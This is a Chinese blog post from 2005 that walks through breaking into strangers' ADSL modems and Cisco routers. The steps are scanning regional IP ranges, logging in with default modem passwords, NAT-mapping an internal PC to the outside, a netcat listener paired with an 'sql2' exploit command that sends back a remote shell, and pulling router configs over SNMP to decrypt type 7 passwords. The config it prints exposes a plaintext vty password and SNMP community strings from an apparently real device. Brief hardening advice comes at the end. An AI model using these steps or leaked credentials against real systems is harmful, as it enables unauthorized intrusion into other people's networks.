http://blog.csdn.net/allyesno/archive/2005/11/27/538043.aspx
现在的入侵手法莫过于一些简单的sql injection填字游戏,这样下去很单调。我最近在研究硬件方面的入侵,也了解了一些从adsl modem和cisco路由器的入侵手法,不敢独享。本文也主要是提供一些具体过程,起个抛砖引玉作用。
一、 从adsl modem的入侵
1. 扫描
现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23、80的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:adsl PASS:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234),Bingo!一矢中的,现在我就是上帝。
图一、华硕adsl modem主页面
2. 映射
本来我们来到图一所示,拿一下上网密码就OK了。但是我们希望要入侵内网,这里只仅仅成功了一半。要进一步入侵内网,我们要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?开始,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)。后来,我发现华硕的doc/lan_conf.htm配置页面已经记载了所有我们想要得到的信息。如图二。
图二、内网配置架构
我们从这里里面可以看出,adsl modem已经配置了dhcp。我们知道dhcp服务是一个自动分配IP地址的网络服务。我们知道DHCP有个特性就是按顺序分配,而且按照一般家庭网络,最多就几台计算机。据分析,可能存在主机IP地址为192.168.0.110、192.168.0.111两台主机。我们这里直接按照192.168.0.110来做实验。但是192.168.0.110到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BIMAP---填入主机IP:192.168.0.110,到此192.168.0.110已经透明地映射到192.168.0.1上了,我们访问ADSL MODEM就等于访问主机192.168.0.110了,如图三。
图三、添加映射规则
图四、superscan后期扫描结果
Nc –v –l 99
sql2 218.xxx.xxx.xxx 0 xxx.xxx.xxx.xxx 99
|
二、 从cisco路由器入侵
(1)一些理论基础
(2)常见入侵方法
########本地密码劫持
########获取cisco配置文件
上面只是一些思路,具体过程我这里不赘述了。下面就具体阐述solarwinds2001得到CISCO密码过程。
solarwinds2001是个集多种功能于一身的cisco管理工具,界面友好。工具条如下图5所示,酷似QQ,清晰明了,如图5。
图5、solarwinds2001界面图
图6、设置关键字private
打开Cisco Tools/IP Network Browser,设置关键字如图6,界面设置如图7。
图7、cisco network browser
随便,在图7中填入一段IP地址进行扫描,扫描后,如果发现cisco路由器,会显示如下图8:
图8、扫描到了cisco路由器
现在我们可以用Cisco Tools/Download Config来下载这台cisco路由器的配置文件。如图9所示:
图9、下载配置文件
好了。现在可以利用Cisco Tools/Config Editor&viewer打开下载好的config文件,如下是我下载的一份配置文件(部分略去):
!#show running-config ---à>>配置环境
version 11.2 ---à>>> IOS版本
no service pad
no service udp-small-servers
no service tcp-small-servers
!
hostname HGHLNDSWSTWD.07.IDF1A.DSW08 ---à>>>配置主机名
!
enable secret 5 $1$ukn/$LU0yrd7/YBqBNJRDlIVes.--->>>>配置enable secet 密码(加密过)
!
!
ip subnet-zero --à>>0子网
!
!
interface VLAN1
ip address ***.11.111.8 255.255.255.192 ----à>>配置ip地址
no ip route-cache ----à>无路由缓存
!
interface FastEthernet0/1 -----à>以下配置e0/1接口
description Port connected to Apt# 7307
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/2 ---à>以下配置e0/2接口
description Port connected to Apt# 7308
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/3 --à>>以下配置e0/3接口
description Port connected to Apt# 7309
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/4 --à>>以下配置e0/4接口
description Port connected to Apt# 7310
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/5 --à>>以下配置e0/5接口
description Port connected to Apt# 7311
shutdown
port security max-mac-count 1
no port security action trap
!
interface FastEthernet0/6 --à>>以下配置e0/5接口
description Port connected to Apt# 7337
port security max-mac-count 1
no port security action trap
。。。。。。。。。。。略去
ip default-gateway ***.11.111.* ------à配置默认网关
mac-address-table secure 0001.0235.5a4e FastEthernet0/2 vlan 1
snmp-server community N3tw0rk RO ---à>snmp社区N3tw0rk
snmp-server community private RW --àsnmp社区private(重要)
snmp-server community public RO --àpublic
snmp-server chassis-id 0x0F
!
line con 0 ---àconsole 0
stopbits 1
line vty 0 4
password MDU!Admin -->>>>配置passwd,明文口令,未作加密处理!!
login
line vty 5 9
password 7 15110E1E2A2F3F---à>>关键所在
login
!
end
最后大家有没有看到这行:
password 7 15110E1E2A2F3F这就是密码了,这个可是是加过密的。
CISCOIOS有三种口令类型 0口令,这个不用说了是明文的。 7口令,就是我们那行看到的那个,有没看到那个7,就是了,现在一般都用这个。 5口令,这个就比较麻烦了,是用MD5哈希算法加密的。 |
如果配置文件中口令经"Service password_encryption"命令加密,比如说这里出现“password 7 15110E1E2A2F3F”类的,用Cisco Tools/Router Password decryption.解密,如图10所示。
图10、solarwinds2001自带解密工具解密结果
之后,我们就可以telnet进去了,而且拥有enable权限,这样我们就无所不能了,注意如果要进一步入侵内网节点,还需要入侵cisco交换机。
三.安全建议
综上,我们网络管理员平常在管理的过程中不仅要注意到软件的安全也要注意到一些硬件的安全。比如在adsl modem方面:我们应该禁止对外通讯端口23、80、21。
对于cisco路由器我们可以有下面的解决办法:
1. 通过no ip http server取消http服务,消除Http带来的隐患
2. 限制SNMP访问配置 ,access-list 10 permit 204.50.25.0 0.0.0.255snmp-server community readwrite RW 10 (通过ACL限制受信主机访问)###########监测非授权的SNMP访问配置##########snmp-server enable traps (设置陷阱)snmp-server trap-authentication (如何认证失败,告诉路由发送陷阱。)snmp-server host 204.50.25.5 (陷阱消息接受工作站)(注:ciscoworks 工作站可以截获这些信息。)
3. 及时升级Cisco的IOS程序或者修补程序。
4. 推荐阅读RAT中的RSCG文档建议.。
5. 利用安全工具对路由进行安全检查。
关于安全的建议问题,不是一劳永逸的事情,漏洞在暗处挖掘着,新的技术在不断膨胀着,因此以上的几点建议只作为参考,实际的运用当中我们应该根据实际情况作出正确的策略。